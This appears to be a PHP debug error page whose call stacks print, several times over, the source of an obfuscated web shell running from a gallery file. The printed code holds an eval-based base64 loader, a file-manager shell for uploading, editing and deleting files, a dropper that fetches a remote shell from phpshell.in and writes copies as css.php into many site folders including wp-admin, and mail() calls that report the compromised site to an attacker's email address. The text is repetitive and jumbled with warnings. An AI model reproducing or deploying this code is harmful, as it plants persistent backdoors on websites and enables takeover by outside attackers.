Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1861540608fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:135
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 136
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1915540608fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:136
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 137
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1946540608fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:137 not exits2done2 .
( ! ) Warning: fopen(C:/wamp64/www/cgi-bin/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 145
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2172540608fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:145
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 146
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2211540608fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:146
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 147
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
